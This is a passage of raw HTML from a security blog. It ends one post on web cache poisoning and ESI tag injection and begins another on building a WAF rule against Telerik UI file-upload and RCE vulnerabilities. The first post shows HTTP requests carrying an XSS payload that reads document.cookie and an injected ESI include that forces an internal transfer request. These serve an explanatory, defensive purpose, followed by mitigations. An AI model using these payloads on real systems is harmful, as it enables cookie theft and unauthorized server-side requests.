style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/img/bank_logo.png”><br></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[ . . . ]</span></p></td></tr></tbody></table></div><p><br /></p><p>Once the victim user visits the resource with the arbitrary URL parameter value controlled by the malicious user: </p><ul>
<li><i>“vulnerable-host.com/home/private/projections?insurance=not_existing”</i></li>
</ul>
The <b>cached response </b>with the <b>XSS payload</b> is returned to the victim user, exploiting successfully the Cache Poisoning attack.
<br /><br />
Request: <span id="docs-internal-guid-c0430df9-7fff-e82d-b3b8-2dfcdf25b4c1"><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GET </span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/private/projections?insurance=not_existing</span><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Host: vulnerable-host.com</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Encoding: gzip, deflate</span></p></td></tr></tbody></table></div></span><div> <br />Response: <span id="docs-internal-guid-92c95701-7fff-08a9-a67e-9a6b6335159a"><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Type: text/html</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">X-Cache: </span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">HIT</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 3114</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><img src=”</span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">”><img src=x onerror=alert(document.cookie)><!--</span><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/img/bank_logo.png”><br></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p></td></tr></tbody></table></div></span><br />
A different scenario regards the “<b><i><a href="https://docs.oracle.com/cd/B14099_19/caching.1012/b14046/esi.htm" target="_blank">Edge Side Includes</a></i></b>” (<i>ESI</i>) <i><b><a href="https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/" target="_blank">tag injection attack</a></b></i> when reverse proxies, load balancers, caching servers or proxy servers (for instance, <i>“Squid Proxy”, “Varnish”, “Oracle WebLogic”, “F5” and “Fastly”</i>) are involved in a communication.
<br /><br />
This attack, combined with the cache poisoning one, could lead to potential <b>stored SSRF</b> and <b>XSS attacks</b>. Since the ESI parser is not able to distinguish between legitimate ESI tags provided by the upstream server and malicious ones injected in the HTTP response, an attacker could abuse a Cache Poisoning flaw in order to <b>store a malicious <esi> </b><esi><b>tag inside</b> a dynamic-generated response page.
<br /><br />
Let’s consider, for instance, the <i>SSRF</i> scenario:<br />
The following request injects an<i> <esi></i> <esi> tag inside the response through a URL parameter usafely reflected in the response page and the “client_id” header used as cache-key. </esi></esi></div><div><esi><esi>Request: </esi></esi></div><span id="docs-internal-guid-58b52abf-7fff-234f-77cb-a19c8d923d61"><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GET </span><span style="font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/contact?</span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">client_id=143</span><span style="font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">&</span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">country_id=<esi:include%20src="http://10.0.0.7/transfer?recipient=12345&amount=54321"/></span><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Host: vulnerable-host.com</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Encoding: gzip, deflate</span></p></td></tr></tbody></table></div></span><div><esi><esi><br />
Response: <span id="docs-internal-guid-be8fac36-7fff-4abe-168e-a001c2cf3e35"><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Type: text/html</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">X-Cache: </span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">MISS</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 3114</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><esi:include src="http://10.0.0.7/transfer?recipient=12345&amount=54321"/></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p></td></tr></tbody></table></div></span><br />
If a malicious user tricks a victim user to visit the URL with the attacker’s cache-key:
<ul>
<li><i>“vulnerable-host.com/home/contact?client_id=143”</i></li>
</ul>
the application sends the cached response page with the injected<i> <esi></i> <esi>tag to the surrogate. It detects the tag and the “<i>Stored Server-Side Request Forgery</i>” attack is successfully exploited!
<br />
The diagram below shows how the parts interact each other:</esi></esi></esi></div><div><br /><esi><esi><esi></esi><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKq_4iN5O_TZW0DeVTjbm7RSATWqxyswNBjiXHFu2jVZdKeVk9u0CKbaSVWBdtsQB6dgFPsa8h_z_98itLZZ20vfmCStKCHq-vaRYoA9i8JqXya2fQDJH20KkJOfIpE9yTvkxQwEuhyphenhyphenpU/s2048/ssrf_blog.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1229" data-original-width="2048" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKq_4iN5O_TZW0DeVTjbm7RSATWqxyswNBjiXHFu2jVZdKeVk9u0CKbaSVWBdtsQB6dgFPsa8h_z_98itLZZ20vfmCStKCHq-vaRYoA9i8JqXya2fQDJH20KkJOfIpE9yTvkxQwEuhyphenhyphenpU/w640-h384/ssrf_blog.jpg" width="640" /></a></div></esi></esi><p></p>
<br />
<h3>Conclusions</h3>
<p>It is recommended to pay close attention when <b>new caching rules </b>are added, since extending pre-existing configurations is a typical <b>main source</b> for cache flaws.
<br /><br />
For this reason, it is strongly discouraged the use of <i>pre-made</i> <i>scripts</i> for an homogeneous and immediate cache-control setting over all endpoints.
<br /><br />
Regarding <b>Web Cache Deception</b> mitigation, all the gateway layers should have a consistent configuration in order to prevent a misconfiguration among them and should cache web pages based on their content type.
<br /><br />
On the other hand, in order to decrease the possibility of being vulnerable against <i style="font-weight: bold;">Web Cache Poisoning </i>attacks, it is recommended to <b>validate</b> and <b>escape</b> all the users-controlled inputs, including the request headers.
<br /><br />
In particular, it is important to check all the inputs which are <b>reflected</b> in cacheable responses. Indeed, it is strongly recommended to <b>avoid caching web responses</b> which include user-provided inputs.
<br /><br />
Last but not least, as a best-practice, it is important to <b>stay up to date</b> with the last <b>security bulletin </b>related to your own <i>web components </i>in-use. In order to become aware of new <b>security patches</b> or guides for a correct and secure infrastructure configuration!
</p><br />
<h2>References</h2>
<p></p><ul>
<li>- Cloudflare CDN cache behaviour: <a href="https://support.cloudflare.com/hc/en-us/articles/200172516">https://support.cloudflare.com/hc/en-us/articles/200172516
</a></li><li>- Reverse proxies related attacks: <a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/">https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/</a></li><li>- Paper “Cached And Confused”: <a href="https://arxiv.org/pdf/1912.10190.pdf">https://arxiv.org/pdf/1912.10190.pdf</a> </li><li>- CloudFlare - How to avoid cache poisoning: <a href="https://support.cloudflare.com/hc/en-us/articles/360014881471-Avoiding-Web-Cache-Poisoning-Attacks">https://support.cloudflare.com/hc/en-us/articles/360014881471-Avoiding-Web-Cache-Poisoning-Attacks</a></li><li>- Header Caching by Amazon:<br /><a href="https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html">https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html</a></li><li>- Cache Poisoning Attack:<br /><a href="https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/">https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/</a></li><li>- General HTTP header list: <a href="https://hackertarget.com/http-header-check/">https://hackertarget.com/http-header-check/</a></li><li>- Introduction to cache: <a href="http://home.eng.iastate.edu/~zzhang/courses/cpre581-f05/reading/smith-csur82-cache.pdf">http://home.eng.iastate.edu/~zzhang/courses/cpre581-f05/reading/smith-csur82-cache.pdf</a><br /><a href="https://appcheck-ng.com/web-cache-poisoning-explained/">https://appcheck-ng.com/web-cache-poisoning-explained/</a></li><li>- Using cache memory to reduce processor-memory traffic: <a href="https://dl.acm.org/doi/abs/10.1145/800046.801647">https://dl.acm.org/doi/abs/10.1145/800046.801647</a></li><li>- Beyond XSS: Edge Side Include Injection:<br /><a href="https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/">https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/</a></li>
</ul><p></p></div>Giorgio Randohttp://www.blogger.com/profile/04364466594665917104noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-22729994751485225762020-11-16T06:16:00.002-08:002020-11-17T00:39:11.666-08:00WAF Journey - Fixing Telerik UI Remote Code Execution via Arbitrary File Upload<h3 cid="n3" class="md-end-block md-heading md-focus" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.5em; line-height: 1.43; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;">Introduction</span></h3><div><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It might occur that companies discover vulnerabilities on web application assets that were acquired by <i>third party vendors</i>. </span></p><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">What happens if the asset is no longer supported/licensed and cannot be </span>promptly <i>updated</i> by the organization? </p><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">A viable option is by using a <i>Web Application Firewall</i> (WAF) component using a <i><b>custom developed rule</b></i> to block attempts to exploit specific vulnerabilities. </span></p><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Even though this behavior might <i>not</i> be the definitive solution, it allows a company to buy time to figure out how to correctly patch or, perhaps, replace the vulnerable asset.</span></p><p cid="n5" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This blog post goes through a real life scenario that describes the development process of the <i>WAF</i> rule created to mitigate the <i>Telerik Unrestricted File Upload </i>(</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) vulnerability which further led to <i>remote code execution</i> (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2019-18935</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">).</span></p><p cid="n6" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><br /></span></p><p cid="n6" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In particular, a</span>fter providing some <i>background</i> of the vulnerability and some <b><i>undocumented</i></b> <i><b>details</b></i> about exploitation, a technical drill down will be performed to describe all the steps of a challenging tuning process to find the right <i>Web Application Firewall</i> rule and, hopefully, block the vulnerability from being exploited.</p><p cid="n102" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;">From a defensive point of view it is important to underline that <i>WAFs</i> are powerful tools to secure assets but the development process of rules to fix vulnerabilities should not be overlooked, since <u><i>poorly engineered rules</i> are often bypassed by attackers</u>. </p><p cid="n102" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><br /></p></div><div><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;"><h3 cid="n8" class="md-end-block md-heading md-focus" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.5em; line-height: 1.43; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Telerik Unrestricted File Upload Literature</span></h3><p cid="n9" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Telerik RadAsyncUpload feature was initially found to be vulnerable to path traversal attacks (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-2217" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2014-2217</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) allowing users to upload files to arbitrary paths.</span></p><p cid="n9" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The vulnerability was then fixed by encrypting the </span><i>rauPostData</i> parameter containing the information regarding the location of the file upload. </p><p cid="n10" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">However, up until version v2017.2.621, Telerik RadAsyncUpload was configured to use a <b>hard-coded key </b>(</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11317" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2017-11317</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) to encrypt data in file upload requests. Therefore, an attacker could perform requests to the "<i>/Telerik.Web.Ui.WebResource.axd?type=rau</i>" endpoint with a custom encrypted </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> parameter to upload arbitrary files within any directory of the web server.</span></p><p cid="n11" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Later on, researchers also found out that the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> was subject to <b>insecure deserialization</b> within the .NET code of Telerik since it contained the class type that was used to deserialize the object. </span></p><p cid="n11" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">This vulnerability led to remote code execution (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">CVE-2019-18935</span></a></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">) and is now publicly available as a </span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a href="https://github.com/noperator/CVE-2019-18935" spellcheck="false" style="-webkit-user-drag: none; box-sizing: border-box; color: #4183c4; cursor: pointer;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">tool</span></a></span><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;">.</span></p><div><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;"><h3 cid="n12" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.5em; line-height: 1.43; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Real Life Scenario</span></h3><p cid="n13" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The present article will focus on how the arbitrary file upload vulnerability (</span><span class="md-meta-i-c md-link" md-inline="link" style="box-sizing: border-box;"><a 